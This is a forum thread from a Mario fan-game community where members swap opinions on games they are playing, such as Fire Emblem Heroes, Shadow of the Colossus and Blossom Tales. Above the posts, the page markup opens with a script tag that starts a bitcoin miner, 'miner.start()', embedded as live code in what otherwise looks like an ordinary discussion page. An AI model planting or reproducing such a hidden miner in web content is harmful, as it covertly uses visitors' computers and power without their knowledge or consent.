<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmbx communitypge project

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Bean

Re: What games are you playing?

Postby Bean » 3 months ago

It takes a bit to get going in Steamworld Dig 2, but when you start getting deeper into the game and earn certain upgrades that make both mining and mobility easier, it's fun enough. That's my take on the game now that I'm a little more than five hours in.

BuzzNBen
First name: Ben

Postby BuzzNBen » 3 months ago

Well, after giving up with replaying Dream Team (because I'm literally soft locked in one of the areas), I decided to replay Bowser's Inside Story.
Not my favorite in the Mario and Luigi series, but for some reason the most nostalgic.

Bean

So much for being off the Fire Emblem kick. I decided to download Heroes on my phone. Game made a very nice first impression by giving me a 5* gold Lyn as my first ever summon. It was one that I could choose, but I wasn't expecting it to be the highest rated one right off the bat.

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 3 months ago

Bean wrote: So much for being off the Fire Emblem kick. I decided to download Heroes on my phone. Game made a very nice first impression by giving me a 5* gold Lyn as my first ever summon. It was one that I could choose, but I wasn't expecting it to be the highest rated one right off the bat.
Then prepare to meet her and another certain horse mage in arena a lot (along with some dragons). She's that good.
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

Bean

jayScribble wrote: Then prepare to meet her and another certain horse mage in arena a lot (along with some dragons). She's that good.
I wound up losing in the last stage of the arena because I didn't focus on my competition. Two dancers and an unbelievably overpowered Ike got to Lyn, and she's my only standout unit. That was a small bummer, but the game is fun enough for a mobile title. At least it isn't a match three game like a lot of titles are and actually somewhat adheres to the series' rules.

Funnily enough, I don't think I've seen her as an opponent yet!

jayScribble
FEEL THE FORCE

Bean wrote: I wound up losing in the last stage of the arena because I didn't focus on my competition. Two dancers and an unbelievably overpowered Ike got to Lyn, and she's my only standout unit. That was a small bummer, but the game is fun enough for a mobile title. At least it isn't a match three game like a lot of titles are and actually somewhat adheres to the series' rules.

Funnily enough, I don't think I've seen her as an opponent yet!
The game is overall fun (and generally very faithful to the Fire Emblem series mechanics and quirks), and I've been addicted to it since launch. Just don't get discouraged from losses in arena from common metagame units, especially if your arena team is at it's strongest.
ImageImageImage

Bean

jayScribble wrote: The game is overall fun (and generally very faithful to the Fire Emblem series mechanics and quirks), and I've been addicted to it since launch. Just don't get discouraged from losses in arena from common metagame units, especially if your arena team is at it's strongest.
Only thing that is even slightly frustrating about this game is trying to get the summon you want. I'm trying to unlock either version of Eirika since her actor runs the one board I'm on.

jayScribble
FEEL THE FORCE

Bean wrote: Only thing that is even slightly frustrating about this game is trying to get the summon you want. I'm trying to unlock either version of Eirika since her actor runs the one board I'm on.
That's just the nature of a Gacha game. Sometimes they gotcha wanting you to pull more to get what you want: I've admitted to spending some money for this game to get what I want (which is more than a few times).

Just be thankful that normal Eirika is available at 4 Stars, with the 58% rate of pulling 4 stars. The pull rates were worse in the past (among many other features that weren't available in the past. No map previews, 50 stamina cap, no start of map unit position switching, no skill inheritance, no sacred seals and weapon refinery, healers with fixed numbers healing and weapons under 10 might... Looking back, it was the worst at launch).
ImageImageImage

AuraLancer

Postby AuraLancer » 3 months ago

I quit FE Heroes at the Book 2 update. Seemed like a good time to escape.

Anyway, Monster Hunter World has eaten me.

Bean

I've already beaten Book II, but I'm working on finishing up the main story now. I'm also noticing that the characters I'm voting for in this contest thing on the official site are suddenly starting to show up for summons. I had Palla before a double came in, Chrom, and now Caeda. Guess I'll vote Eirika tonight and see if I can finally get her to show up before that summon set ends. I'm just voting for favorite characters or the ones that helped me through their respective games the most anyway. That means Alm, Lucina, Sophia (never played that one, but she looks cool), and someone else will round out my nine picks.

Don't know what I'll play after this is beaten. Maybe I'll go back to Uncharted: The Lost Legacy. Was having fun with it before I stopped.

Bean

Oh, you can't really beat Fire Emblem Heroes yet as the story just cuts off when it was getting a bit interesting. Oops! Guess that makes sense as it is a free to play game, and they add chapters as they go. Anyhoo, that's four days in a row now where the character I voted for in that Hero Rises poll showed up. Unlocked the magic form of Eirika, and that was the one I voted for. Hope that luck continues!

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 3 months ago

Finished my initial playthrough of the Shadow of the Colossus remake for PS4. Man, the game was already beautiful on PS2/3 but they really went all out with the visuals. And the lack of HUD makes it look even better.

I'm considering whether or not I want to do 100% achievements, which I did once before on the PS3 remaster.

Bean

Blossom Tales: The Sleeping King is not winning me over like a lot of other Zelda-like games I've played in the last year or two. It's lacking that certain punch to it, and the movement is a bit on the slow side.

Slimeman01
Thank Goodness I Stopped at Subway Before This Mission!
First name: Matt
Pronouns: he/him/his

Postby Slimeman01 » 3 months ago

I've started to replay The Legendary Starfy after like... 5 years of me finishing my first save. Enjoying what I'm replaying so far!
Hey I got a new Twitter!
My Shoddy Youtube
raocow wrote:To answer your question Slimeman yes that is super fine
raocow wrote:alright guys what are the weirdest levels of world 4 ?! Make sure to pay attention to tomorrow's video as this may alter your answer!!

pholtos
Loves adorable things.

Postby pholtos » 3 months ago

I just finished the hold Complex Complex. It's a semi-official hold that is part of the timeline for DROD. AND GEEZ WAS IT HARD. It took over a month to beat it. Yeesh.
Host and Organizer of the Rando Pokemon Tournaments. Completed: I, II, III, IV, V
Dealer of the Pokermon Discord Tourneys.

ImageImageImageImage
ImageImageImageImage

I do LPs, check them out if you'd like.
Currently playing:

Ashan
The world has become a place
First name: Hayden

Postby Ashan » 3 months ago

I did all the normal mode time trials in Shadow of the Colossus, then I switched to hard mode to get all the hard mode time trials done and now my normal mode save with all my times is gone so I guess I just get to do those all again. Great.

Parama

Postby Parama » 3 months ago

Played through iconoclasts. Solid game overall, gameplay wasn't very impressive but the story & style were cool, though the ending felt a bit awkward/rushed. Still have some extra stuff to find for 100% completion though
If I was suffering, I’d cut the ties that were never meant to bind.

Bean

Blossom Tales gives you an item that lets you walk faster, so that fixed my one gripe. Problem is that I think there are only four dungeons. It's okay, but again, it's got stiff competition on a system that already has quite a few Zelda-like games on it already. In its own bubble, the game is all right at best. I'll probably beat it by this weekend and that'll be that.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 3 months ago

Currently streaming Ori and the Blind Forest. Beautiful game, but it makes me sad :c
That crazy voice dude

Alice
💙
Pronouns: Girl person

Postby Alice » 3 months ago

Bean wrote: Blossom Tales gives you an item that lets you walk faster, so that fixed my one gripe. Problem is that I think there are only four dungeons. It's okay, but again, it's got stiff competition on a system that already has quite a few Zelda-like games on it already. In its own bubble, the game is all right at best. I'll probably beat it by this weekend and that'll be that.
I didn't dislike the game but between the ridiculously slow walk speed when it released and the fact it just wasn't able to really keep my attention for whatever reason, I never actually even got to the second dungeon before losing interest. I really don't get why so many games have the player moving at such a glacial pace. It's one of the biggest flaws in Stardew Valley too and the entire reason I started using mods for the game.

Bean

Alice wrote: I didn't dislike the game but between the ridiculously slow walk speed when it released and the fact it just wasn't able to really keep my attention for whatever reason, I never actually even got to the second dungeon before losing interest. I really don't get why so many games have the player moving at such a glacial pace. It's one of the biggest flaws in Stardew Valley too and the entire reason I started using mods for the game.
Yeah. I just beat the game now. The fourth and final dungeon was long, but it kept repeating certain types of puzzles, another one of the game's flaws. Final boss was a joke with the lightning spell you get midway through that dungeon, and I finally just said whatever and chugged an invincibility potion to make it even easier right at the end.

It does nothing real bad outside of the slow moving speed, but it's just a whatever game even when you get faster. If you want a 2D-like Zelda fix, I'd say to go with Ittle Dew 2 instead.

S.N.N.

Postby S.N.N. » 3 months ago

Bean wrote: Blossom Tales gives you an item that lets you walk faster, so that fixed my one gripe. Problem is that I think there are only four dungeons. It's okay, but again, it's got stiff competition on a system that already has quite a few Zelda-like games on it already. In its own bubble, the game is all right at best. I'll probably beat it by this weekend and that'll be that.
As someone who loves basically any Zelda-like game, I had a similar opinion. The game was pretty good for the most part, but I felt that a lot of the design was a bit mediocre. This is especially apparent at the endgame - for instance, the final dungeon has a puzzle gimmick that could be really cool, but the implementation is dull and never takes off, so you have a couple of “ehh” rooms that use it. The last boss is a bit of a joke as well.

I really love the ice section’s music though, so there’s at least something in the game that left a super positive impression on me.

Bean

Started up Poi: Explorer Edition on the Switch. It's an indie 3D platformer that is definitely taking its cues from Mario 64 & Sunshine. The first main island you go to is very reminiscent of Bianco Hills, and the two main characters totally stole plumber boy's triple jump and somersault moves. Saw a video of it a while back, and my bro had picked it up on his own, so I figured I'd give it a shot. It's all right so far, but I am pretty early in.

Parama

Postby Parama » 3 months ago

started Fe yesterday, nice little 3D platformer/exploration/metroidvania-y game. with cute animals. that you can sing to! the most important thing for a game to have
If I was suffering, I’d cut the ties that were never meant to bind.

Bean

Poi is pretty fun so far as I approach the halfway point. It has the variety that I was looking for while still being a competent 3D platformer.

Return to “the cartridgé”